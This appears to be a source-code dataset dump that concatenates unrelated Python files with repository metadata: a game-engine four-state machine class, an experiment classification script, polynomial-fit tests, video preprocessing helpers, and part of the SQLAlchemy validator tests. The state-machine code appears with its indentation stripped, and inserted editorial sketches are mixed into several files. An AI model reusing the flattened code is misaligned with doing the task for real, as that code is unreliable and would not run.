assert self.debugPrint("isOn() returning %s (stateIndex=%s)"%(self.stateIndex==4, self.stateIndex))
return self.stateIndex==4
def changedOnState(self, isOn):
"""
        Allow derived classes to override this.
The self.isOn value has toggled. Call getIsOn() to
get the current state.
"""
assert self.debugPrint("changedOnState(isOn=%s)"%(isOn,))
##### states #####
def switchToNextStateTask(self, task):
assert self.debugPrint("switchToNextStateTask()")
self.fsm.request(self.states[self.nextStateIndex])
return Task.done
def distributeStateChange(self):
"""
        This function is intentionally simple so that derived classes
may easily alter the network message.
"""
assert self.debugPrint("distributeStateChange()")
self.sendState()
def enterStateN(self, stateIndex, nextStateIndex):
assert self.debugPrint(
"enterStateN(stateIndex=%s, nextStateIndex=%s)"%
(stateIndex, nextStateIndex))
self.stateIndex = stateIndex
self.nextStateIndex = nextStateIndex
self.distributeStateChange()
if self.durations[stateIndex] is not None:
assert self.doLaterTask is None
self.doLaterTask=taskMgr.doMethodLater(
self.durations[stateIndex],
self.switchToNextStateTask,
"enterStateN-timer-%s"%id(self))
def exitStateN(self):
assert self.debugPrint("exitStateN()")
if self.doLaterTask:
taskMgr.remove(self.doLaterTask)
self.doLaterTask=None
##### state 0 #####
def enterState0(self):
assert self.debugPrint("enter0()")
self.enterStateN(0, 0)
def exitState0(self):
assert self.debugPrint("exit0()")
##### state 1 #####
def enterState1(self):
#assert self.debugPrint("enterState1()")
self.enterStateN(1, 2)
def exitState1(self):
assert self.debugPrint("exitState1()")
self.exitStateN()
##### state 2 #####
def enterState2(self):
#assert self.debugPrint("enterState2()")
self.enterStateN(2, 3)
def exitState2(self):
assert self.debugPrint("exitState2()")
self.exitStateN()
##### state 3 #####
def enterState3(self):
#assert self.debugPrint("enterState3()")
self.enterStateN(3, 4)
def exitState3(self):
assert self.debugPrint("exitState3()")
self.exitStateN()
##### state 4 #####
def enterState4(self):
assert self.debugPrint("enterState4()")
self.enterStateN(4, 1)
self.changedOnState(1)
def exitState4(self):
assert self.debugPrint("exitState4()")
self.exitStateN()
self.changedOnState(0)
if __debug__:
def debugPrint(self, message):
"""for debugging"""
return self.notify.debug("%d (%d) %s"%(
id(self), self.stateIndex==4, message))
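# --- Illustrative sketch (editor's addition, not part of the original class) ---
# The enterStateN calls above wire nextStateIndex as 1 -> 2 -> 3 -> 4 -> 1
# (state 0 being the initial/final 'off' state); the duration list decides
# which hops fire automatically. Ignoring the timers, the cycle in miniature:
if __name__ == '__main__':
    _names = ['off', 'opening', 'open', 'closing', 'closed']  # docstring example
    _next_of = {0: 0, 1: 2, 2: 3, 3: 4, 4: 1}
    _state = 1
    for _ in range(4):
        print(_names[_state])        # opening, open, closing, closed
        _state = _next_of[_state]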
| 33.050725
| 107
| 0.484652
|
__all__ = ['FourStateAI']
from direct.directnotify import DirectNotifyGlobal
import ClassicFSM
import State
from direct.task import Task
class FourStateAI:
notify = DirectNotifyGlobal.directNotify.newCategory('FourStateAI')
def __init__(self, names, durations = [0, 1, None, 1, 1]):
self.stateIndex = 0
assert self.debugPrint(
"FourStateAI(names=%s, durations=%s)"
%(names, durations))
self.doLaterTask = None
assert len(names) == 5
assert len(names) == len(durations)
self.names = names
self.durations = durations
self.states = {
0: State.State(names[0],
self.enterState0,
self.exitState0,
[names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1],
self.enterState1,
self.exitState1,
[names[2], names[3]]),
2: State.State(names[2],
self.enterState2,
self.exitState2,
[names[3]]),
3: State.State(names[3],
self.enterState3,
self.exitState3,
[names[4], names[1]]),
4: State.State(names[4],
self.enterState4,
self.exitState4,
[names[1]]),
}
self.fsm = ClassicFSM.ClassicFSM('FourState',
self.states.values(),
names[0],
names[0],
)
self.fsm.enterInitialState()
def delete(self):
assert self.debugPrint("delete()")
if self.doLaterTask is not None:
self.doLaterTask.remove()
del self.doLaterTask
del self.states
del self.fsm
def getState(self):
assert self.debugPrint("getState() returning %s"%(self.stateIndex,))
return [self.stateIndex]
def sendState(self):
assert self.debugPrint("sendState()")
self.sendUpdate('setState', self.getState())
def setIsOn(self, isOn):
assert self.debugPrint("setIsOn(isOn=%s)"%(isOn,))
if isOn:
if self.stateIndex != 4:
self.fsm.request(self.states[3])
else:
if self.stateIndex != 2:
# ...if it's not Off; request turning off:
self.fsm.request(self.states[1])
def isOn(self):
assert self.debugPrint("isOn() returning %s (stateIndex=%s)"%(self.stateIndex==4, self.stateIndex))
return self.stateIndex==4
def changedOnState(self, isOn):
assert self.debugPrint("changedOnState(isOn=%s)"%(isOn,))
def switchToNextStateTask(self, task):
assert self.debugPrint("switchToNextStateTask()")
self.fsm.request(self.states[self.nextStateIndex])
return Task.done
def distributeStateChange(self):
assert self.debugPrint("distributeStateChange()")
self.sendState()
def enterStateN(self, stateIndex, nextStateIndex):
assert self.debugPrint(
"enterStateN(stateIndex=%s, nextStateIndex=%s)"%
(stateIndex, nextStateIndex))
self.stateIndex = stateIndex
self.nextStateIndex = nextStateIndex
self.distributeStateChange()
if self.durations[stateIndex] is not None:
assert self.doLaterTask is None
self.doLaterTask=taskMgr.doMethodLater(
self.durations[stateIndex],
self.switchToNextStateTask,
"enterStateN-timer-%s"%id(self))
def exitStateN(self):
assert self.debugPrint("exitStateN()")
if self.doLaterTask:
taskMgr.remove(self.doLaterTask)
self.doLaterTask=None
def enterState0(self):
assert self.debugPrint("enter0()")
self.enterStateN(0, 0)
def exitState0(self):
assert self.debugPrint("exit0()")
def enterState1(self):
self.enterStateN(1, 2)
def exitState1(self):
assert self.debugPrint("exitState1()")
self.exitStateN()
def enterState2(self):
self.enterStateN(2, 3)
def exitState2(self):
assert self.debugPrint("exitState2()")
self.exitStateN()
def enterState3(self):
self.enterStateN(3, 4)
def exitState3(self):
assert self.debugPrint("exitState3()")
self.exitStateN()
def enterState4(self):
assert self.debugPrint("enterState4()")
self.enterStateN(4, 1)
self.changedOnState(1)
def exitState4(self):
assert self.debugPrint("exitState4()")
self.exitStateN()
self.changedOnState(0)
if __debug__:
def debugPrint(self, message):
return self.notify.debug("%d (%d) %s"%(
id(self), self.stateIndex==4, message))
| true
| true
|
1c491ab6c233c3d0fde8e8f78bc978736494bc63
| 4,635
|
py
|
Python
|
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | 3
|
2019-07-09T15:37:46.000Z
|
2019-07-17T16:28:02.000Z
|
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | null | null | null |
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 12 16:07:58 2018
@author: nmei
in exp2 (e2) there were 3 possible awareness ratings (e.g. 1 - no experience, 2 - brief glimpse, 3 - almost clear or clear perception),
BUT we can make a binary classification by focusing on 1 and 2, which are the majority of the trials.
"""
if __name__ == '__main__':
import os
import pandas as pd
import numpy as np
import utils
# define result saving directory
dir_saving = 'results_e2'
if not os.path.exists(dir_saving):
os.mkdir(dir_saving)
try:# the subject level processing
df1 = pd.read_csv('e2.csv').iloc[:,1:]
except: # when I test the script
df1 = pd.read_csv('../e2.csv').iloc[:,1:]
df = df1.copy()
# select the columns that I need
df = df[['blocks.thisN',
'trials.thisN',
'key_resp_2.keys',
'resp.corr',
'resp_mrating.keys',
'participant',]]
# rename the columns
df.columns = ['blocks',
'trials',
'awareness',
'correctness',
'confidence',
'participant',]
# preallocate the data frame structure
results = dict(sub = [],
model = [],
score = [],
window = [],
correctness = [],
awareness = [],
confidence = [],
chance = [],
)
# use success, awareness, and confidence as features
np.random.seed(12345)
# use judgement features
feature_names = [
'correctness',
'awareness',
'confidence',
]
target_name = 'confidence'
experiment = 'e2'
# for some of the variables, we need to rescale them to a more preferable range like 0-1
name_for_scale = ['awareness']
# 'ack', 'cc', 'ck', 'cpj', 'em', 'es', 'fd', 'jmac', 'lidia', 'ls','mimi', 'pr', 'pss', 'sva', 'tj'
# get one of the participants' data
participant = 'sva'
df_sub = df[df['participant'] == participant]
# pick 1- no experience, 2 brief glimpse for binary classification
df_sub = df_sub[df_sub['awareness'] != 3]
# for 1-back to 4-back
for n_back in np.arange(1,5):
# experiment score
results = utils.classification(
df_sub.dropna(), # take out nan rows
feature_names, # feature columns
target_name, # target column
results, # the saving structure
participant, # participant's name
experiment, # experiment name
window = n_back, # N-back
chance = False, # it is NOT estimating the chance level but the empirical classification experiment
name_for_scale = name_for_scale # scale some of the variables
)
# empirical chance level
results = utils.classification(
df_sub.dropna(),
feature_names,
target_name,
results,
participant,
experiment,
window = n_back,
chance = True, # it is to estimate the empirical chance level
name_for_scale = name_for_scale
)
results_to_save = pd.DataFrame(results)
results_to_save.to_csv(os.path.join(dir_saving,'{}.csv'.format(participant)))
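# --- Illustrative sketch (editor's addition, not part of the original script) ---
# The "empirical chance level" computed above, in miniature: score a classifier
# on the real labels, then on shuffled labels, and compare. utils.classification
# is project-specific, so scikit-learn serves as a stand-in here (an assumption):
def _chance_demo():
    import numpy as np
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import cross_val_score
    rng = np.random.RandomState(0)
    X = rng.randn(200, 3)
    y = (X[:, 0] + 0.5 * rng.randn(200) > 0).astype(int)
    real = cross_val_score(LogisticRegression(), X, y, cv=5).mean()
    chance = cross_val_score(LogisticRegression(), X, rng.permutation(y), cv=5).mean()
    return real, chance   # real well above chance (~0.5)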
| 31.965517
| 159
| 0.408846
|
if __name__ == '__main__':
import os
import pandas as pd
import numpy as np
import utils
dir_saving = 'results_e2'
if not os.path.exists(dir_saving):
os.mkdir(dir_saving)
    try:
        df1 = pd.read_csv('e2.csv').iloc[:,1:]
    except:
        df1 = pd.read_csv('../e2.csv').iloc[:,1:]
df = df1.copy()
df = df[['blocks.thisN',
'trials.thisN',
'key_resp_2.keys',
'resp.corr',
'resp_mrating.keys',
'participant',]]
df.columns = ['blocks',
'trials',
'awareness',
'correctness',
'confidence',
'participant',]
results = dict(sub = [],
model = [],
score = [],
window = [],
correctness = [],
awareness = [],
confidence = [],
chance = [],
)
np.random.seed(12345)
feature_names = [
'correctness',
'awareness',
'confidence',
]
target_name = 'confidence'
experiment = 'e2'
name_for_scale = ['awareness']
participant = 'sva'
df_sub = df[df['participant'] == participant]
# pick 1- no experience, 2 brief glimpse for binary classification
df_sub = df_sub[df_sub['awareness'] != 3]
# for 1-back to 4-back
for n_back in np.arange(1,5):
# experiment score
results = utils.classification(
df_sub.dropna(), # take out nan rows
feature_names, # feature columns
target_name, # target column
results, # the saving structure
participant, # participant's name
        experiment,
        window = n_back,
        chance = False,
        name_for_scale = name_for_scale
        )
results = utils.classification(
df_sub.dropna(),
feature_names,
target_name,
results,
participant,
experiment,
window = n_back,
        chance = True,
        name_for_scale = name_for_scale
)
results_to_save = pd.DataFrame(results)
results_to_save.to_csv(os.path.join(dir_saving,'{}.csv'.format(participant)))
| true
| true
|
1c491afc51f17dc03bb931dc49f52fe76e38b519
| 84
|
py
|
Python
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-translator
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 70
|
2017-12-12T10:54:00.000Z
|
2022-03-22T07:45:19.000Z
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 14
|
2018-02-28T01:29:46.000Z
|
2019-12-10T01:42:22.000Z
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 4
|
2019-07-21T07:58:25.000Z
|
2021-02-01T09:46:59.000Z
|
import numpy as np
def numpy_random12_test(n):
return np.random.random_sample(n)
| 16.8
| 35
| 0.785714
|
import numpy as np
def numpy_random12_test(n):
return np.random.random_sample(n)
| true
| true
|
1c491cd25b535c646b407c2dfd699502dec5cea3
| 2,152
|
py
|
Python
|
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
import numpy as np
import polyFits as pf
import json
fn = './test/'
f = open(fn+'database.txt', 'r')
database = f.readlines()
f.close()
aoa, dp, cl, cd, cm = [], [], [], [], []
for line in database[1:]:
aoa.append( float( line[ 8: 25] ) )
dp.append( float( line[ 34: 51] ) )
cl.append( float( line[ 60: 77] ) )
cd.append( float( line[ 87:103] ) )
cm.append( float( line[112: ] ) )
X = np.array([aoa, dp]).T
f = open(fn+'fit_CL.json', 'r')
clDict = json.load(f)
f.close()
f = open(fn+'fit_CD.json', 'r')
cdDict = json.load(f)
f.close()
f = open(fn+'fit_Cm.json', 'r')
cmDict = json.load(f)
f.close()
aCL, nvecCL, r2CL = pf.dict2list(clDict)
aCD, nvecCD, r2CD = pf.dict2list(cdDict)
aCm, nvecCm, r2Cm = pf.dict2list(cmDict)
f = open(fn+'a5dp10.txt', 'r')
clval = float(f.readline())
cdval = float(f.readline())
cmval = float(f.readline())
f.close()
aoa, dp = 5.*np.pi/180., 10.*np.pi/180.
def test_simpleConstraints():
aaCL, rr2CL = pf.multivariablePolynomialFit(nvecCL, X, cl, sym_same=[(0,1)], verbose=False)
assert len(aCL) == len(aaCL)
for j in range(pf.calcJ(nvecCL)):
assert aCL[j] == aaCL[j]
assert r2CL == rr2CL
cclval = pf.multivariablePolynomialFunction(aCL, nvecCL, [aoa, dp])
assert clval == cclval
def test_percent():
aaCD, rr2CD = pf.multivariablePolynomialFit(nvecCD, X, cd, sym_diff=[(0,1)], percent=True, verbose=False)
assert len(aCD) == len(aaCD)
for j in range(pf.calcJ(nvecCD)):
assert aCD[j] == aaCD[j]
assert r2CD == rr2CD
ccdval = pf.multivariablePolynomialFunction(aCD, nvecCD, [aoa, dp])
assert cdval == ccdval
def test_weighting():
def w(x, y, p):
if abs(y[p]) < 0.0001:
return 1.
return 0.0001 / abs(y[p])
aaCm, rr2Cm = pf.multivariablePolynomialFit(nvecCm, X, cm, sym_same=[(0,1)], weighting=w, verbose=False)
assert len(aCm) == len(aaCm)
for j in range(pf.calcJ(nvecCm)):
assert aCm[j] == aaCm[j]
assert r2Cm == rr2Cm
ccmval = pf.multivariablePolynomialFunction(aCm, nvecCm, [aoa, dp])
assert cmval == ccmval
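# --- Illustrative sketch (editor's addition, not part of the original tests) ---
# What the weighting callback in test_weighting does: samples with |y| below
# 1e-4 keep full weight, larger ones are down-weighted as 1e-4/|y|, i.e. a
# relative-error style weighting. On concrete numbers:
def _weighting_demo():
    return [(yv, 1. if abs(yv) < 0.0001 else 0.0001 / abs(yv))
            for yv in (0.00005, 0.0001, 0.01)]
# _weighting_demo() -> [(5e-05, 1.0), (0.0001, 1.0), (0.01, 0.01)]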
| 26.243902
| 109
| 0.605019
|
import numpy as np
import polyFits as pf
import json
fn = './test/'
f = open(fn+'database.txt', 'r')
database = f.readlines()
f.close()
aoa, dp, cl, cd, cm = [], [], [], [], []
for line in database[1:]:
aoa.append( float( line[ 8: 25] ) )
dp.append( float( line[ 34: 51] ) )
cl.append( float( line[ 60: 77] ) )
cd.append( float( line[ 87:103] ) )
cm.append( float( line[112: ] ) )
X = np.array([aoa, dp]).T
f = open(fn+'fit_CL.json', 'r')
clDict = json.load(f)
f.close()
f = open(fn+'fit_CD.json', 'r')
cdDict = json.load(f)
f.close()
f = open(fn+'fit_Cm.json', 'r')
cmDict = json.load(f)
f.close()
aCL, nvecCL, r2CL = pf.dict2list(clDict)
aCD, nvecCD, r2CD = pf.dict2list(cdDict)
aCm, nvecCm, r2Cm = pf.dict2list(cmDict)
f = open(fn+'a5dp10.txt', 'r')
clval = float(f.readline())
cdval = float(f.readline())
cmval = float(f.readline())
f.close()
aoa, dp = 5.*np.pi/180., 10.*np.pi/180.
def test_simpleConstraints():
aaCL, rr2CL = pf.multivariablePolynomialFit(nvecCL, X, cl, sym_same=[(0,1)], verbose=False)
assert len(aCL) == len(aaCL)
for j in range(pf.calcJ(nvecCL)):
assert aCL[j] == aaCL[j]
assert r2CL == rr2CL
cclval = pf.multivariablePolynomialFunction(aCL, nvecCL, [aoa, dp])
assert clval == cclval
def test_percent():
aaCD, rr2CD = pf.multivariablePolynomialFit(nvecCD, X, cd, sym_diff=[(0,1)], percent=True, verbose=False)
assert len(aCD) == len(aaCD)
for j in range(pf.calcJ(nvecCD)):
assert aCD[j] == aaCD[j]
assert r2CD == rr2CD
ccdval = pf.multivariablePolynomialFunction(aCD, nvecCD, [aoa, dp])
assert cdval == ccdval
def test_weighting():
def w(x, y, p):
if abs(y[p]) < 0.0001:
return 1.
return 0.0001 / abs(y[p])
aaCm, rr2Cm = pf.multivariablePolynomialFit(nvecCm, X, cm, sym_same=[(0,1)], weighting=w, verbose=False)
assert len(aCm) == len(aaCm)
for j in range(pf.calcJ(nvecCm)):
assert aCm[j] == aaCm[j]
assert r2Cm == rr2Cm
ccmval = pf.multivariablePolynomialFunction(aCm, nvecCm, [aoa, dp])
assert cmval == ccmval
| true
| true
|
1c491ddc1083a7330a21f38ee5180e48205db0d8
| 5,606
|
py
|
Python
|
vidbench/data/process.py
|
melaniebeck/video-classification
|
eeb879605f8265ce28a007d5239f0e85aeed0719
|
[
"Apache-2.0"
] | 2
|
2022-02-11T20:49:44.000Z
|
2022-02-25T14:52:42.000Z
|
vidbench/data/process.py
|
melaniebeck/video-classification
|
eeb879605f8265ce28a007d5239f0e85aeed0719
|
[
"Apache-2.0"
] | 2
|
2022-01-05T22:59:30.000Z
|
2022-01-24T19:39:49.000Z
|
vidbench/data/process.py
|
isabella232/CML_AMP_Video_Classification
|
145eb44ac70e7669a706d5f67914a7d28fd931fe
|
[
"Apache-2.0"
] | 1
|
2022-03-07T18:23:59.000Z
|
2022-03-07T18:23:59.000Z
|
# ###########################################################################
#
# CLOUDERA APPLIED MACHINE LEARNING PROTOTYPE (AMP)
# (C) Cloudera, Inc. 2021
# All rights reserved.
#
# Applicable Open Source License: Apache 2.0
#
# NOTE: Cloudera open source products are modular software products
# made up of hundreds of individual components, each of which was
# individually copyrighted. Each Cloudera open source product is a
# collective work under U.S. Copyright Law. Your license to use the
# collective work is as provided in your written agreement with
# Cloudera. Used apart from the collective work, this file is
# licensed for your use pursuant to the open source license
# identified above.
#
# This code is provided to you pursuant a written agreement with
# (i) Cloudera, Inc. or (ii) a third-party authorized to distribute
# this code. If you do not have a written agreement with Cloudera nor
# with an authorized and properly licensed third party, you do not
# have any rights to access nor to use this code.
#
# Absent a written agreement with Cloudera, Inc. (“Cloudera”) to the
# contrary, A) CLOUDERA PROVIDES THIS CODE TO YOU WITHOUT WARRANTIES OF ANY
# KIND; (B) CLOUDERA DISCLAIMS ANY AND ALL EXPRESS AND IMPLIED
# WARRANTIES WITH RESPECT TO THIS CODE, INCLUDING BUT NOT LIMITED TO
# IMPLIED WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE; (C) CLOUDERA IS NOT LIABLE TO YOU,
# AND WILL NOT DEFEND, INDEMNIFY, NOR HOLD YOU HARMLESS FOR ANY CLAIMS
# ARISING FROM OR RELATED TO THE CODE; AND (D)WITH RESPECT TO YOUR EXERCISE
# OF ANY RIGHTS GRANTED TO YOU FOR THE CODE, CLOUDERA IS NOT LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, PUNITIVE OR
# CONSEQUENTIAL DAMAGES INCLUDING, BUT NOT LIMITED TO, DAMAGES
# RELATED TO LOST REVENUE, LOST PROFITS, LOSS OF INCOME, LOSS OF
# BUSINESS ADVANTAGE OR UNAVAILABILITY, OR LOSS OR CORRUPTION OF
# DATA.
#
# ###########################################################################
import cv2
import imageio
import numpy as np
import pathlib
from tensorflow_docs.vis import embed
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def crop_center_square(frame):
"""Crops a square from the center of a rectangular array."""
y, x = frame.shape[0:2]
min_dim = min(y, x)
start_x = (x // 2) - (min_dim // 2)
start_y = (y // 2) - (min_dim // 2)
return frame[start_y : start_y + min_dim, start_x : start_x + min_dim]
def pad_to_square(frame):
"""Pads a rectangular array with zeros, so as to make it squared."""
y, x = frame.shape[0:2]
if y > x:
add_x_left = (y - x) // 2
add_x_right = y - x - add_x_left
frame = cv2.copyMakeBorder(
frame, 0, 0, add_x_left, add_x_right, cv2.BORDER_CONSTANT, value=0
)
else:
add_y_up = (x - y) // 2
add_y_down = x - y - add_y_up
frame = cv2.copyMakeBorder(
frame, add_y_down, add_y_up, 0, 0, cv2.BORDER_CONSTANT, value=0
)
return frame
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def load_and_resize_video(path, resize=(224, 224), resize_type="crop"):
"""Convert video to Numpy array of shape and type expected by i3d model.
The function resizes them to shape
[max_frames, 224, 224, 3], in RGB format, with floating point values in
range [0, 1], as expected by i3d.
"""
cap = cv2.VideoCapture(path)
frames = []
try:
while True:
ret, frame = cap.read() # frame is in BGR format
if not ret:
break
if resize_type == "crop":
frame = crop_center_square(frame)
elif resize_type == "pad":
frame = pad_to_square(frame)
else:
                raise ValueError("Invalid resize_type: " + resize_type)
frame = cv2.resize(frame, resize)
frame = frame[:, :, [2, 1, 0]] # Convert from BGR to RGB
frames.append(frame)
finally:
cap.release()
return np.array(frames).astype("float32") / 255.0
def resample_video(video: np.ndarray, num_frames: int) -> np.ndarray:
    """ Resample a video to have num_frames frames.
    Video must have shape (1, current_num_frames, :, :, :).
    If num_frames < current_num_frames, the video is downsampled by removing frames
    more or less evenly spaced throughout the duration of the video.
    If num_frames > current_num_frames, the video is upsampled by duplicating frames
    more or less evenly spaced throughout the duration of the video.
    """
current_num_frames = video.shape[1]
indices = [(current_num_frames * i) // num_frames for i in range(num_frames)]
return video[:, indices, :, :, :]
def video_acceptable(video_np, min_num_frames_acceptable: int = 128) -> bool:
"""Checks if video has minimum acceptable temporal length"""
num_frames = video_np.shape[1]
if num_frames < min_num_frames_acceptable:
        print(f"Skipping video, too few frames: {num_frames}")
return False
return True
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def to_gif(images):
"""Converts an array of images to gif."""
converted_images = np.clip(images * 255, 0, 255).astype(np.uint8)
imageio.mimsave("./animation.gif", converted_images, fps=25)
return embed.embed_file("./animation.gif")
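# --- Usage sketch (editor's addition): end-to-end preprocessing for one clip.
# "clip.mp4" is a placeholder path; i3d-style models expect a leading batch axis.
if __name__ == "__main__":
    video = load_and_resize_video("clip.mp4", resize_type="pad")  # (T, 224, 224, 3)
    batch = video[np.newaxis, ...]                                # (1, T, 224, 224, 3)
    if video_acceptable(batch, min_num_frames_acceptable=64):
        batch = resample_video(batch, num_frames=64)              # (1, 64, 224, 224, 3)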
| 39.758865
| 86
| 0.665715
|
import cv2
import imageio
import numpy as np
import pathlib
from tensorflow_docs.vis import embed
def crop_center_square(frame):
y, x = frame.shape[0:2]
min_dim = min(y, x)
start_x = (x // 2) - (min_dim // 2)
start_y = (y // 2) - (min_dim // 2)
return frame[start_y : start_y + min_dim, start_x : start_x + min_dim]
def pad_to_square(frame):
y, x = frame.shape[0:2]
if y > x:
add_x_left = (y - x) // 2
add_x_right = y - x - add_x_left
frame = cv2.copyMakeBorder(
frame, 0, 0, add_x_left, add_x_right, cv2.BORDER_CONSTANT, value=0
)
else:
add_y_up = (x - y) // 2
add_y_down = x - y - add_y_up
frame = cv2.copyMakeBorder(
frame, add_y_down, add_y_up, 0, 0, cv2.BORDER_CONSTANT, value=0
)
return frame
def load_and_resize_video(path, resize=(224, 224), resize_type="crop"):
cap = cv2.VideoCapture(path)
frames = []
try:
while True:
            ret, frame = cap.read()
            if not ret:
break
if resize_type == "crop":
frame = crop_center_square(frame)
elif resize_type == "pad":
frame = pad_to_square(frame)
else:
                raise ValueError("Invalid resize_type: " + resize_type)
frame = cv2.resize(frame, resize)
            frame = frame[:, :, [2, 1, 0]]
            frames.append(frame)
finally:
cap.release()
return np.array(frames).astype("float32") / 255.0
def resample_video(video: np.ndarray, num_frames: int) -> np.ndarray:
current_num_frames = video.shape[1]
indices = [(current_num_frames * i) // num_frames for i in range(num_frames)]
return video[:, indices, :, :, :]
def video_acceptable(video_np, min_num_frames_acceptable: int = 128) -> bool:
num_frames = video_np.shape[1]
if num_frames < min_num_frames_acceptable:
        print(f"Skipping video, too few frames: {num_frames}")
return False
return True
def to_gif(images):
converted_images = np.clip(images * 255, 0, 255).astype(np.uint8)
imageio.mimsave("./animation.gif", converted_images, fps=25)
return embed.embed_file("./animation.gif")
| true
| true
|
1c491e75f6745580f6f9854e23a8cb08a7146e21
| 15,242
|
py
|
Python
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 5,383
|
2018-11-27T07:34:03.000Z
|
2022-03-31T19:40:59.000Z
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 2,719
|
2018-11-27T07:55:01.000Z
|
2022-03-31T22:09:44.000Z
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 1,056
|
2015-01-03T00:30:17.000Z
|
2022-03-15T12:56:24.000Z
|
from sqlalchemy import exc
from sqlalchemy.orm import collections
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import ne_
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from test.orm import _fixtures
class ValidatorTest(_fixtures.FixtureTest):
def test_scalar(self):
users = self.tables.users
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
self.mapper_registry.map_imperatively(User, users)
sess = fixture_session()
u1 = User(name="ed")
eq_(u1.name, "ed modified")
assert_raises(AssertionError, setattr, u1, "name", "fred")
eq_(u1.name, "ed modified")
eq_(canary.mock_calls, [call("name", "ed"), call("name", "fred")])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="ed modified").one(),
User(name="ed"),
)
def test_collection(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("addresses")
def validate_address(self, key, ad):
canary(key, ad)
assert "@" in ad.email_address
return ad
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
sess = fixture_session()
u1 = User(name="edward")
a0 = Address(email_address="noemail")
assert_raises(AssertionError, u1.addresses.append, a0)
a1 = Address(id=15, email_address="foo@bar.com")
u1.addresses.append(a1)
eq_(canary.mock_calls, [call("addresses", a0), call("addresses", a1)])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="edward").one(),
User(
name="edward", addresses=[Address(email_address="foo@bar.com")]
),
)
def test_validators_dict(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
ne_(name, "fred")
return name + " modified"
@validates("addresses")
def validate_address(self, key, ad):
assert "@" in ad.email_address
return ad
def simple_function(self, key, value):
return key, value
u_m = self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
eq_(
dict((k, v[0].__name__) for k, v in list(u_m.validators.items())),
{"name": "validate_name", "addresses": "validate_address"},
)
def test_validator_w_removes(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name", include_removes=True)
def validate_name(self, key, item, remove):
canary(key, item, remove)
return item
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.name = "ed"
u1.name = "mary"
del u1.name
a1, a2, a3 = Address(), Address(), Address()
u1.addresses.append(a1)
u1.addresses.remove(a1)
u1.addresses = [a1, a2]
u1.addresses = [a2, a3]
eq_(
canary.mock_calls,
[
call("name", "ed", False),
call("name", "mary", False),
call("name", "mary", True),
# append a1
call("addresses", a1, False),
# remove a1
call("addresses", a1, True),
# set to [a1, a2] - this is two appends
call("addresses", a1, False),
call("addresses", a2, False),
# set to [a2, a3] - this is a remove of a1,
# append of a3. the appends are first.
# in 1.2 due to #3896, we also get 'a2' in the
# validates as it is part of the set
call("addresses", a2, False),
call("addresses", a3, False),
call("addresses", a1, True),
],
)
def test_validator_bulk_collection_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
